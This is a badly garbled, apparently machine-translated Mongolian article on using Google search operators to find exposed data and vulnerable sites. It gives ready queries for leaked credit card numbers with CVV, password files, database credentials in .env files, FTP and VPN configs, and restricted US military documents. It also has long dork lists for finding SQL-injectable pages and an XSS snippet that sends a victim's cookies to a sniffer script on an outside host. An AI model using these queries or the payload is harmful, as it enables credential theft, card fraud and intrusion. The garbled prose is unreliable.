Арьсны операторын хувьд илүү том богино нэртэй хувилбарыг сайжруулсан (бүгд угтваргүй). Ялгаа нь allinurl нь үгсийн утгыг мэддэг, харин inurl нь зөвхөн эхнийх нь юм. Үгүй бол хүсэлтийн доромжилсон үгсийг вэб хуудсанд бүрэн байршуулж болно. Inurl оператор нь сайтын хувьд ижил төстэй өөр нэг оператор шиг харагдаж байна - site. Эхнийх нь баримт бичигт илгээсэн тэмдэгтүүдийн дараалал (жишээ нь, /cgi-bin/) өөр өөр ялгаатай бүрэлдэхүүн хэсгүүдийг хайхад өргөн хэрэглэгддэг эсэхийг мэдэх боломжийг олгодог.

Үүнийг практик дээр туршиж үзье. Бид allintext шүүлтүүрийг авч, ийм байдлаар ажилладаг бөгөөд ингэснээр та зээлийн картуудын дугаар, хөрвүүлэх кодын жагсаалттай танилцсаны дараа асуух хугацаа нь хоёр жил хүрэхгүй хугацаанд дуусна (өөрөөр бол тэдгээр нь тохирохуйц ухаалаг бол). бүх кредит).

Allintext: картын дугаар дуусах хугацаа /2017 cvv

Хэрэв та залуу хакер Пентагон эсвэл НАСА-гийн "серверүүд рүү нэвтэрч, нууц мэдээлэлд худал хэлсэн" гэсэн мэдээг уншсан бол Google-ийг ашиглах ийм энгийн арга техникийг өөрөө ашиглах нь дээр. Бидэнд НАСА-гийн тагнуулчдын жагсаалт, холбоо барих хаяг байгаа гэж бодъё. Мэдээжийн хэрэг, ийм төстэй байдал нь цахим хэлбэрээр байдаг. Тодорхой болгох эсвэл хяналт тавихын тулд дарсыг байгууллагын вэбсайтаас олж болно. Энэ нь логик юм, Энэ тохиолдолд ямар ч илгээх байх болно, дотоод Викториа томилгооны дарсны хэлтэрхий. Ийм файлд ямар үг байж болох вэ? Хамгийн багадаа - "хаяг" талбар. Perevіriti бүх tsі pripuschenna хамгийн энгийн байдлаар.

inurl:nasa.gov файлын төрөл:xlsx "хаяг"

Користуэсийн хүнд суртал

Үүнтэй төстэй мэдлэг - хүлээн авагч. Шударга байдлаар, хатуу барих нь вэб хостуудад зориулсан Google-ийн операторууд, маш Merezhya, shukany бүтцийн онцлогуудын талаар илүү нарийвчилсан мэдлэгийг баталгаажуулдаг. Нарийвчилсан мэдээллийг мэдсэнээр та шаардлагатай файлуудын эрх мэдлийг хялбархан шүүж, тодруулж, өгөгдлийн жинхэнэ утгыг арилгах боломжтой болно. Энд хүнд суртал яаж авардаг нь инээдтэй. Энэ нь та Мереж рүү нэвтэрсэн нууц мессежүүдийг зальтай шивнэх ердийн томьёо гаргах гэж байна.

Жишээлбэл, АНУ-ын Батлан ​​хамгаалах яамны оффис дахь obov'yazkovy маркийн түгээлтийн мэдэгдэл нь баримт бичгийн өргөнийг стандартчилан солилцох гэсэн үг юм. А үсэг нь нууц зүйлгүй олон нийтийн хэвлэлийг илэрхийлдэг; B - дотоод victoria-аас бага шинж тэмдэг, C - зөвхөн F хүртэл чанд нууц. Энэ нь илүү их эрх тэгш бүрэн эрхт байдлыг тогтоохын төлөө онцгой үнэ цэнэтэй X үсгийн төлөө зогсох нь зүгээр юм. Үйлчилгээний хэл дээр ажиллах шаардлагатай хүмүүст ийм бичиг баримтыг шоглож байг, бид C үсэгтэй файлуудыг холих болно. Энэ нь DoDI 5230.24 удирдамжид үндэслэсэн бөгөөд ийм тэмдэглэгээг шүүмжлэлтэй тайлбарлахад ашиглаж болох баримт бичигт оноодог. экспортын хяналтад хамаарах чухал технологиуд. Ийм болгоомжтой хамгаалагдсан мэдээллийг илчлэх нь АНУ-ын армийн дээд түвшний.mil домэйны сайтууд дээр байж болно.

"ТАРХАЛТЫН МЭДЭГДЭЛ C" inurl:navy.mil

.mil домэйнд АНУ-ын Батлан ​​хамгаалах яам болон бусад гэрээлэгч байгууллагуудын сайт байхгүй байх нь илүү тохиромжтой. Poshukov-ын vidach ын obmezhennyam домэйн дээр бүх арга зам нь цэвэр гарч ирж, толгой - өөрсдөө. ОХУ-ын нууц зэрэгтэй төстэй Шукати нь бараг marno юм: домэйнд.

Хэрэв та .mil домэйн дэх сайтын аливаа баримт бичгийг хүндэтгэн шалгавал хүсэлтийг тодруулахын тулд бусад тэмдэглэгээг ашиглаж болно. Жишээлбэл, "Sec 2751" экспортын бирж рүү илгээсэн бөгөөд та техникийн мэдээллийг гараар хайж болно. Заримдаа та албан ёсны сайтаас холддог, гэхдээ нэгэнт гэрэлтсэн бол ямар нэгэн зүйл хайж байхдаа cіkavim мессеж хайж чадахгүй байгаа хүмүүст Google-ийн кэш (кэшийн оператор) эсвэл Интернет архивын сайт руу яараарай.

Бид харанхуйгаас холддог

Krіm vipadkovo төрийн байгууллагуудын баримт бичгүүдийн нууцыг задалж, Google-ийн кэш дээр Dropbox болон бусад мэдээлэл цуглуулах үйлчилгээний тусгай файлууд дээрх мессежүүдийг нэг цагийн турш нэгтгэж, олон нийтэд нийтлэгдсэн өгөгдөл дээр "хувийн" мессеж үүсгэдэг. Альтернатив болон бие даасан үйлчилгээтэй бол тэд илүү сайн байдаг. Жишээлбэл, дараагийн алхам бол чиглүүлэгч дээр FTP сервер суулгасан бүх Verizon үйлчлүүлэгчдийн өгөгдлийг мэдэх явдал юм.

allinurl: ftp://verizon.net

Нэгэн зэрэг дөчин мянга гаруй ийм мэргэн хүмүүс байсан бөгөөд 2015 оны хавар илүү их хэмжээний захиалга гарчээ. Verizon.net-ийн орлогч нь өөр ямар ч үйлчилгээ үзүүлэгчийн нэрийг санал болгож болох бөгөөд хэн нь мэдэгдэх болно, тэд илүү их зүйлийг олж авах боломжтой. FTP серверээр дамжуулан та чиглүүлэгчтэй холбогдсон гадаад санах ойн төхөөрөмж дээрх файлуудыг харж болно. Алсын ажил, хувийн уйтгар гуниг, эсвэл үе тэнгийнхэн рүү файл татаж авахын тулд tse NAS руу залгаарай. Эдгээр бүх хамарыг Google болон бусад хайлтын системүүд индексжүүлдэг тул гадаад дискэнд хадгалагдсан файлуудад хандах хандалтыг шууд хүсэлтээр хийх боломжтой.

Тохиргоог харж байна

Харанхуй руу бөөний нүүдэллэхээс өмнө, хол зайд, энгийн FTP серверүүдийг эрхэмлэдэг байсан бөгөөд үүнд зөрчилдөөн байсан. Тэдний зарим нь хамааралтай, dosі. Жишээлбэл, алдартай WS_FTP Professional програмд ​​тохиргоо, бичлэгийн төрөл, нууц үгийн талаарх мэдээллийг ws_ftp.ini файлаас хадгалдаг. Мэдэх, уншихад хялбар, бүх бичлэгүүд нь текст хэлбэрээр хадгалагдаж, нууц үг нь хамгийн бага будилсны дараа Гурвалсан DES алгоритмыг ашиглан шифрлэгдсэн байдаг. Илүү том хувилбаруудын хувьд эхний байтыг арилгахад л хангалттай.

Ийм нууц үгийн кодыг тайлах нь WS_FTP Нууц үг тайлах хэрэгсэл эсвэл зардал багатай вэб үйлчилгээний тусламжтайгаар хялбар байдаг.

Сайтын хор хөнөөлийн талаар ярихдаа CMS тохиргооны файлууд эсвэл цахим худалдааны нэмэлтүүдийн бүртгэл, нөөцлөлтөөс нууц үгээ устгахыг уриал. Хэрэв та ердийн бүтцийг мэддэг бол түлхүүр үгсийг хялбархан оруулж болно. Ws_ftp.ini-тэй төстэй мөрүүд илүү өргөн байна. Жишээлбэл, Drupal болон PrestaShop нь хэлний тусгай танигч (UID) болон хүчинтэй нууц үг (pwd)-тэй бөгөөд бүх мэдээллийг extensions.inc-тэй файлуудаас цуглуулдаг. Shukati їх дараах байдлаар хийж болно.

"pwd=" "UID=" ext:inc

DBMS дахь нууц үгийн түгжээг тайлах

SQL серверүүдийн тохиргооны файлуудад имэйлийн нэр хаягууд сонгосон форматаар хадгалагдаж, нууц үг нь MD5 хэш дээр бичигдсэн байдаг. Тэднийг тайлж, хатуу мэт санагдах, боломжгүй, prote хэш-нууц үгийн дунд хосуудын хүчинтэй байдлыг мэдэж болно.

Энэ цаг хүртэл DBMS-ийг шифрлэж байгаа бөгөөд зарим хэл дээр нууц үг хэшгүй байна. Тэдгээрийн аль нэгнийх нь тохиргооны файлуудыг хөтөч дээрээс үзэх боломжтой.

Intext:DB_PASSWORD файлын төрөл:env

Windows серверүүд дээр гарч ирэх үед тохиргооны файлуудын байршлыг ихэвчлэн бүртгэлийн газар эзэлдэг. Иогийн gіlkah дээр Shukati файлын төрөл адил зэрэглэл, vikoristovuyuchi reg байж болно. Жишээлбэл, тэнхлэг нь:

Файлын төрөл:reg HKEY_CURRENT_USER "Нууц үг"=

Тодорхой зүйлийн талаар бүү мартаарай

Хаалттай мэдээлэлд нэвтрэх боломжтой зарим хүмүүс Google-ийн үүр цайх талбарт зарцуулсан нэмэлт vipadkovo vіdkritikh өгөгдлийг хайхаар явдаг. Хамгийн тохиромжтой сонголт бол нууц үгийн жагсаалтыг зарим өргөтгөсөн форматаар мэдэх явдал юм. Текст файл, Word баримт эсвэл Excel хүснэгтийн ташуу бичлэгүүдээс өгөгдлийг хадгалахыг зөвхөн хамгийн нэр хүндтэй хүмүүс хийх боломжтой, гэхдээ та тэдгээрийг үргэлж ашиглах боломжтой.

Файлын төрөл: xls inurl: нууц үг

Нэг талаасаа үүнтэй төстэй үйл явдлуудыг устгахад зориулж маш олон коштив байдаг. Энэ нь htaccess, CMS засварлах, зүүн скриптийг хакердах, бусад dirki-г хакердах зэрэгт зохих нэвтрэх эрхийг хангах шаардлагатай. Би мөн шинэ файл болон лавлахууд дахь хайлтын системийн мөлхөгчдийг индексжүүлсэн robots.txt файлын алдааны жагсаалт бүхий файлыг ашигладаг. Нөгөөтэйгүүр, миний сервер дээрх robots.txt-ийн бүтэц нь стандарт шиг харагдаж байгаа тул шинэ сервер дээр зарим нэг заль мэх байгаа нь шууд тодорхой болсон.

Аливаа сайт дээрх лавлах, файлуудын жагсаалтыг стандарт индексээр үзүүлэв. Үйлчилгээний зориулалттай хэлтэрхий нь гарчигт орсон гэм буруутай, дараа нь intitle оператороор хүрээлэгдсэн її хайлт гэсэн мэдрэмж байдаг. Эдгээр үгс нь /admin/, /personal/, / etc/ лавлахаас олддог ба навигац /нууц/.

Шинэчлэлтүүдийг дагасан

Энд байгаа хамаарал нь маш чухал юм: хуучин зөрчилдөөнийг зохих ёсоор багасгасан боловч Google болон тэр його Пошуковын vidach байнга өөрчлөгдөж байдаг. Өөрөөр хэлбэл, "үлдсэн секундын дотор" (&tbs=qdr:s, жишээ нь, хүсэлтийн URL) болон "бодит цагт" (&tbs=qdr:1) шүүлтүүрийн хооронд шилжинэ.

Google файлын шинэчлэлтийн огнооны хугацааны интервалыг мөн тодорхой зааж өгсөн болно. График вэб интерфэйсээр дамжуулан та ердийн үеүүдийн аль нэгийг (жил, өдөр, өдөр гэх мэт) сонгох эсвэл огнооны хязгаарыг тохируулах боломжтой, эс тэгвээс энэ арга нь автоматжуулалтад тохиромжгүй болно.

Хаягийн мөрийг хараад зөвхөн нэмэлт бүтээн байгуулалтын &tbs=qdr: үр дүнд хүрэх арга замыг таамаглаж болно. Үүний дараах y үсэг нь нэг удаагийн хязгаарыг тогтоох ёстой (&tbs=qdr:y), m нь үлдсэн сарын үр дүнг, w - долоо хоног, d - сүүлийн өдөр, h - үлдсэн хугацаанд үр дүнг харуулна. жил, n - өвөл, s - надад секунд өг. Google-д танил болсон хамгийн сүүлийн үеийн илэрцүүд нь &tbs=qdr:1 нэмэлт шүүлтүүрээр алдартай.

Хэрэв та Google-д огнооны мужийг Julian форматаар daterange оператороор тохируулсан гэдгийг мэдэж байгаа бол төвөгтэй скрипт бичих шаардлагатай. Жишээлбэл, 2015 оны 1 өдрөөс 1 өдөр хүртэлх нууц үгтэй PDF баримтын жагсаалтыг ийм байдлаар мэдэж болно.

Нууц файлын төрөл:pdf огноо:2457024-2457205

Мужийг бутархай хэсгийн засваргүйгээр Жулиан огнооны форматаар зааж өгсөн болно. Тэдгээрийг гаргүйгээр Григорийн хуанлиас гараар орчуулаарай. Огноо хөрвүүлэгчийг ашиглах нь илүү хялбар байдаг.

Зорилтот, дахин шүүлт

Krіm vkazіvki dodatkovykh operіvі, poshkovomu їх їх энэ нь tіlі silaannya шууд nadsilati боломжтой юм. Жишээлбэл, filetype:pdf-ийн тодруулга нь as_filetype=pdf бүтцийг агуулдаг. Ийм зэрэглэлд хөнгөхөн тавья, тодруулбал. Зөвхөн Бүгд Найрамдах Гондурас улсын үр дүнг харгалзан хайлтын системд URL барилгын cr=countryHN, тэр ч байтугай Бобруйск хотоос нэмэхийг зөвшөөрнө - gcs=Bobruisk . Та бүрэн жагсаалтыг жижиглэн худалдаачдаас олж болно.

Google-ийн товшилтыг автоматжуулах зардал нь амьдралыг хөнгөвчлөх боловч ихэвчлэн асуудал үүсгэдэг. Жишээлбэл, WHOIS-ээр дамжуулан koristuvach-ийн IP-г нэг газар зааж өгсөн. Google-д мэдээлэл оруулах үед серверүүдийн хоорондын хоосон байдал нь тэнцвэртэй байхаас гадна хайлтын үр дүнгийн үр дүн өөрчлөгддөг. Нэгдvгээр талдаа янз бvрийн vр дvнгээ үрэн таран хийж, зарим нь гацаанд орох нь яг адилхан хvсэлттэй бvс нутагт ашигтай. gl=улсын удирдамжийн дараа shukati мэдээлэл ын be-yakoy kraїni її dvolіterny код нь cosmopolitan мэдэж байх. Жишээлбэл, Нидерландын код нь NL, Google-ийн Ватикан, Пивничный Солонгосууд өөрсдийн кодыг оруулаагүй болно.

Ихэнхдээ Пошуковын видач нь ялсан тооны шүүлтүүр оруулсны дараа цохигдсон мэт харагддаг. Ийм випадкатай бол шинийг унтраах унтраалга нэмэх замаар усан хангамжийг тодруулахад хялбар байдаг (хасах хэсгийг арьсны урд талд тавьдаг). Жишээлбэл, Personal, banking гэсэн үгтэй, нэрс і заавар . Үүний тулд цэвэр хайлтын үр дүн нь сурах бичиг биш харин тодруулгыг харуулах болно:

Гарчиг:"Index of /Personal/" -нэрүүд -сургалт -банк

Бусдад өгзөг

Мэдээллийн хакер нь өөрт хэрэгтэй бүх зүйлээ өөрөө хариуцдаг. Жишээ нь, VPN нь тохиромжтой зүйл, гэхдээ энэ нь үнэтэй, өөрөөр хэлбэл энэ нь timchasova болон с obezhennyami юм. Зөвхөн өөрөө захиалах нь харагдахгүй байна. Сайн байна, бүлгийн захиалга гэж юу вэ, Google-ийн тусламжтайгаар бүлгийн нэг хэсэг болоход хялбар байдаг. Cisco VPN тохиргооны файл руу хэн хандах, хэнд зориулж стандарт бус PCF өргөтгөл болон vіdomiy slyakh хандах: Програмын файлууд \ Cisco Systems \ VPN Client \ Profiles . Нэг хүсэлт, та жишээ нь Боннын их сургуулийн найрсаг хамт олонтой нэгдээрэй.

Файлын төрөл: pcf vpn OR Group

МЭДЭЭЛЭЛ

Нууц үг нь шифрлэгдсэн харагдацаас хадгалагдсан боловч Морис Массард үүнийг тайлах програмыг аль хэдийн бичсэн бөгөөд энэ нь thecampusgeeks.com-оор үнэгүй юм.

Олон зуун төрлийн халдлага, нэвтрэлтийн тестүүд Google-ийн тусламжийг хүлээж байна. Алдартай программууд, мэдээллийн сангийн үндсэн формат, PHP-ийн тоон зөрчил, там гэх мэт сонголтууд байхгүй. Шивнэж байгаа хүмүүсийг үнэн зөв илчлэхийн тулд шаардлагатай мэдээллийг авах шаардлагатай (ялангуяа tієї, тэд хэт халуун усны газар дээр ажиллахаар төлөвлөөгүй байсан). Үзэл бодолтой амьдрах цорын ганц Shodan биш, харин merezhevyh нөөцийг индексжүүлэх үндэс суурь болно!

Би мэдээллийн аюулгүй байдлын талаар хэдэн үг бичсэн. Энэхүү нийтлэл нь програмист-эхлэгч болон Frontend-rozrobkoy-д дөнгөж оролцож эхэлсэн хүмүүст хамааралтай байх болно. Асуудал юу вэ?

Маш олон жижиглэн худалдаачид-початкивцивууд бичсэн кодын талаар маш их бухимддаг тул роботуудынхаа аюулгүй байдлын талаар мартдаг. Илүү тэнэг зүйл бол SQL, XXS асуух гэх мэт зөрчилдөөнийг март. Мөн тэд өөрсдийн удирдлагын самбарт хялбар нууц үг үүсгэж, харгис хүчээр ажилладаг. Та тэдэнд ямар төрлийн дайралт хийж чадах вэ?

SQL тарилга

SQL injection нь тодорхой DBMS-д зориулсан SQL асуулга хийх үед тохиолддог мэдээллийн санд халддаг хамгийн өргөн тархсан төрөл юм. Маш олон хүмүүс ийм халдлагад өртөж, гайхалтай компаниудыг байгуулдаг. Үүний шалтгаан нь өгөгдлийн сан болон SQL асуулга бичих цагийг жижиглэнгийн худалдаачин өршөөсөн явдал юм.

SQL асуулгад олдсон оролтын өгөгдлийг буруу боловсруулснаар SQL блоклох төрөл рүү халдах боломжтой. Хакерын зүгээс алсын зайнаас халдлага хийснээр та цөөн тооны мэдээллийн сангаас гадна нууц үг, удирдлагын самбарын бүртгэлийг зарцуулах эрсдэлтэй. Эдгээр өгөгдөл нь хангалттай байх тул би сайтыг сэргээх эсвэл шинэ сайтад тохиролцох боломжгүй засвар хийх болно.

Халдлагыг PHP, ASP, Perl болон бусад хэл дээр бичсэн скриптүүд дээр амжилттай хэрэгжүүлэх боломжтой. Ийм халдлагын амжилт нь DBMS хэрхэн ялагдаж, скрипт өөрөө хэрхэн хэрэгжсэнээс шалтгаална. Дэлхий дээр SQL-іn'єktsіy-д зориулсан олон төрлийн сайтууд байдаг. Чиомуг давахад амархан. "Зам" -ыг нэвтрүүлэхэд хангалттай - өөр өөр сайтуудыг хайж олохыг хүсэх тусгай хүсэлтүүд. Тэдгээрийн үйл ажиллагааны тэнхлэг:

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:pageid=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

Тэдний талаар хэрхэн шуугиан дэгдээх вэ? Тэдгээрийг Google хайлтын систем эсвэл Yandex-д оруулахад хангалттай. Poshukovik та зүгээр л нэг үл нийцэх сайтыг харж болно, гэхдээ нөгөө талаас ижил нийцэхгүй байна. Алеми, бид chomu zupinyatisya болон perekonayemosya дээр байх болно, scho үнэний тал нь ууртай байна. "id=1" гэсэн утга хангалттай байвал "'" нэг хөл тавина. Үүнтэй адил:

• inurl:games.php?id=1'

I сайт бид SQL асуулгын талаар өршөөл үзүүлж байна. Манай хакерт юу хэрэгтэй байсан бэ?

Мөн түүнд өршөөл үзүүлэх тухай захидал илгээх шаардлагатай болсон. "Kali linux" түгээлтийн иж бүрдэл дэх орчин нь түүний хэрэгслүүдтэй нийцэхгүй байгаа талаар эхний хэсгээс эхлэн ажиллацгаая: зааварчилгааны кодыг хэрэгжүүлэх, шаардлагатай үйлдлүүдийг хэрэгжүүлэх. Энэ нь яаж болохыг би хэлж чадахгүй. Гэхдээ та энэ тухай мэдээллийг интернетээс олж болно.

XSS халдлага

Энэ төрлийн халдлага нь жигнэмэгт нөлөөлдөг. Їх, өөрийнхөө зүрх сэтгэлд, користувачуудыг аварч, аврах дуртай. Яагаад үгүй ​​гэж? Тэдэнгүйгээр яах вэ? Aje Zavdyaki Cookies бид Vk.com болон Mail.ru сайтаас зуу дахин их нууц үг жолооддоггүй. Мөн тэднээр удирдуулсан бага зэрэг чимээгүй байдаг. Гэхдээ интернет дээр хакеруудын хувьд амжилтын түвшин нь аюулгүй байдлын хүчин зүйлтэй шууд пропорциональ гэсэн дүрэм байдаг.

XSS халдлагыг хэрэгжүүлэхийн тулд манай хакер JavaScript-ийг мэддэг байх ёстой. Эхлээд харахад Mova нь компьютерийн нөөцөд нэвтэрч чаддаггүй хүмүүст маш энгийн бөгөөд shkidliva биш юм. Pratsyuvati z JavaScript хакер нь зөвхөн хөтөч дээр л хангалттай, арай илүү байж болно. Аже smut вэб дээр кодыг оруулна уу.

Би халдлагын үйл явцын талаар дэлгэрэнгүй ярихгүй. Rozpovim энэ нь яаж байгаа юм шиг санагддаг мэдрэмжийн үндэслэлээс бага.

Хакер нь форум эсвэл зочны дэвтэрт JS код нэмж болно:

Скриптүүд нь биднийг халдвар авсан тал руу чиглүүлж, кодыг олж авах болно: энэ нь үнэрлэгч, цуглуулга эсвэл манай күүкиг кэшээс хулгайлдаг.

Яагаад JavaScript өөрөө? Учир нь JavaScript вэб хүсэлттэй сайн ажилладаг бөгөөд күүки рүү хандах боломжтой. Гэхдээ хэрэв бидний скрипт биднийг ямар нэгэн сайт руу шилжүүлэх юм бол санахад хялбар болно. Нэн даруй, хакер zastosovuє зальтай сонголт - зүгээр л зурган дээрх кодыг оруулна уу.

Img=newImage();

Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

Бид зүгээр л скриптийнхээ хаягаар танд хамаарах зургийг бүтээж байна.

Юунаас өөрийгөө хэрхэн аврах вэ? Энэ нь бүр ч хялбар - сэжигтэй мессеж рүү бүү ор.

DoS ба DDos халдлага

DoS (Англи хэлнээс Deial of Service - Vіdmova v oblugovuvannі) - vіdmovi руу її авчрах аргын тусламжтайгаар тооцооллын системд хакерын халдлага. Ийм оюун ухааныг бий болгох нь зарим төрлийн хураангуй системийн хувьд системийн нөөцөд (серверүүд) хандах боломжгүй боловч хандах нь хэцүү байдаг. Vіdmova системүүд нь її zakhoplennya нь Croc байж болно, санамсаргүй нөхцөл байдалд yakscho PZ чухал мэдээлэл байгаа эсэхийг хардаг: жишээ нь, хувилбар, хөтөлбөрийн кодын хэсэг болон іn. Гэхдээ дэлхийн эдийн засгийн дарамтын хамгийн сайн хэсэг нь орлого авчирдаг энгийн үйлчилгээний зардал юм. Үйлчилгээ үзүүлэгчээс Rakhunki эсвэл довтолгооны үүдэнд орж ирвэл гэдэсний "хэмжээ" -ийг тодорхой харж болно. Энэ цаг үед DoS болон DDoS халдлага нь хамгийн алдартай нь бөгөөд ингэснээр хууль эрх зүйн ач холбогдолтой нотлох баримтыг үлдээхгүйгээр бүхэл бүтэн системийг практикт нэвтрүүлэх боломжийг олгодог.

DoS нь DDos халдлагаас юугаараа ялгаатай вэ?

DoS халдлагыг боломжийн аргаар өдөөсөн. Жишээлбэл, сервер оролтын пакетуудын зөв эсэхийг шалгахгүй бол хакер үүрд боловсруулагдах ийм хүсэлтийг үүсгэж болох бөгөөд бусад өгөгдөлтэй ажиллахад процессорын цагийг ашиглахгүй. Үйлчлүүлэгчид үйлчилгээнд санаа тавьдаг нь ойлгомжтой. Ale perevantazhit АБО явахгүй байх агуу vіdomі сайтууд нь ийм арга зам нь тааруулж авах. Тэд газар дээр нь өргөн хүрээний суваг, өндөр даралтын серверүүдтэй тул ийм шилжилтийг ямар ч асуудалгүйгээр даван туулж чадна.

DDoS нь үнэндээ DoS-тэй ижил халдлага юм. Хэдийгээр DoS-д нэг пакет шаардагддаг боловч DDoS-д хэдэн зуу ба түүнээс дээш байж болно. Navit navitzhnі сервер бөгөөд ийм бизнест саад болж чадахгүй. Би танд жишээ хэлье.

DoS халдлага - Хэрэв та rozmovu z кимос удирдаж байгаа бол, харин дараа нь та хүн хүлээсийг нь тайлсан юм шиг гарч ирж, чанга хашгирч эхэлдэг. Энэ нь боломжгүй эсвэл илүү төвөгтэй хүнтэй шилжих боломжгүй юм. Шийдвэр: баригдсан хүнийг тайвшруулахын тулд хамгаалалтыг дуудах. DDoS-халдлагууд - хэрэв НАТО-д ийм бусармаг хүмүүс олон мянган байвал. Ийм сэтгэл санааны үед хамгаалалтыг мушгиж, алдаж болно.

DoS болон DDoS нь зомби гэж нэрлэгддэг компьютерээс үүсдэг. Tse хакерууд coristuvachs-ийн компьютерийг хакердсан тул тэдний машин ийм серверийн халдлагад оролцож байна гэж сэжиглэхгүй байна.

Хэрхэн өөрийгөө vіd tsgogo аврах вэ? Арга ч үгүй. Але, та хакерын ажлыг хөнгөвчлөх боломжтой. Хэний хувьд хатуу сервертэй сайн хостинг сонгох шаардлагатай вэ.

Харгис хүчний дайралт

Розробник нь довтолгооны олон системийг үзэх, бидний бичсэн скриптүүдийг илүү олон удаа үзэх, сайтаас зөрчилтэй эсэхийг шалгах гэх мэт боломжтой. Хэрэв та сайтын бусад хэсэг рүү явах гэж байгаа бол админ самбар дээр нууц үг оруулбал нэг үгийг мартаж болно. Нууц үг!

Энгийн нууц үг оруулахыг зөвлөдөггүй. Та 12345, 1114457, vasya111 гэх мэтийг ашиглаж болно. 10-11 тэмдэгтээс бага нууц үг оруулахыг зөвлөдөггүй. Үгүй бол та хамгийн нийтлэг бөгөөд болхи довтолгоог таньж чадна - Brute Force.

Brute force гэдэг нь төрөл бүрийн тусгай программуудын толь бичгийн нууц үгэнд харгис хүчээр халдах явдал юм. Толь бичгүүд нь өөр байж болно: Латин цагаан толгой, тоонуудын хувьд бүдүүлэг, тодорхой хэмжээнд хэлбэлзэх, өөрчлөх (Латин + цифрүүд), өвөрмөц тэмдэгт бүхий толь бичгүүдийг удирдах @#4$%&*~~`'”\ ? тэр дотор.

Мэдээжийн хэрэг, ийм төрлийн халдлагыг арилгахад хялбар байдаг. Dosit vigadati эвхэгддэг нууц үг. Та captcha-д хууртагдаж болно. Мөн түүнчлэн, хэрэв таны сайт CMS дээр эвдэрсэн бол тэдгээрийн олонх нь ижил төрлийн халдлагыг тоолж, ip блоклодог. Нууц үгэнд илүү олон янзын тэмдэгт байдаг гэдгийг санах нь зүйтэй бөгөөд энэ нь його сонгохоос илүү чухал юм.

Хакеруудыг хэрхэн дадлагажуулах вэ? Ихэнх тохиолдолд тэд сэжиглэж, эсвэл нууц үгийн зарим хэсгийг мэдэхэд хэтэрхий оройтсон байдаг. Користувачийн нууц үг нь 3 эсвэл 5 тэмдэгтээр эвхэгддэггүй гэж таамаглах нь илүү логик юм. Ийм нууц үгийг хэсэгчилсэн хорон муу болгон бууруулж болно. Үндсэндээ хакерууд 5-10 тэмдэгтийн хязгаарыг авч, түүндээ хэд хэдэн тэмдэгт нэмдэг бөгөөд ингэснээр тэд үүнийг урьдчилан мэддэг. Дали шаардлагатай мужаас нууц үг үүсгэдэг. Кали линуксийн түгээлт нь ийм өөрчлөлт хийх програмуудтай байдаг. Мөн voila, халдлага нь урт trivatime урт байхаа больсон, толь бичиг нь аль хэдийн тийм их биш байсан нь үнэн хэрэгтээ. Тэр болтол хакер видео картын хатуулгийг zadіyati болно. deyakі їх нь CUDA системийг дэмждэг бөгөөд тэдгээрийн swidkіst харгис хүч нь 10 дахин нэмэгддэг. I axis mi bachimo, ийм энгийн аргаар халдлага нь бүхэлдээ бодит юм. Насны харгис хүч нь зөвхөн сайтуудад хамаарахгүй.

Эрхэм жижиглэн худалдаачид, мэдээллийн аюулгүй байдлын системийн талаар бүү мартаарай, өнөөдөр ч гэсэн ийм төрлийн халдлагын өмнө цөөхөн хүн, зокрема, эрх мэдэлтнүүд хохирч байна. Ажа, хамгийн том зөрчилдөөн бол эрэгтэй хүн юм, дүрмээр бол та энд байж болно, эсвэл эндээс харж чадахгүй. Бид программист, гэхдээ програмчлагдсан машин биш. Мэдээлэл алдагдах нь ноцтой үр дагаварт хүргэж болзошгүй байсан ч сонор сэрэмжтэй байгаарай!

Тиймээс, өнөөдөр би ямар ч тусгай мэдлэггүйгээр хорон муу санаатай хүмүүсийн талаар танд хэлэх болно. Би та нарт хэлье, энэ нь хангалттай биш, гэхдээ бүгд адилхан.
Эхлэхийн тулд та сайтуудыг өөрсдөө мэдэх хэрэгтэй. Хэнд зориулж google.com руу орж зам дагуу алхаарай

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= i nurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl : prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view . php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= url:theme. php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:транскрипт. php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2. php?option= 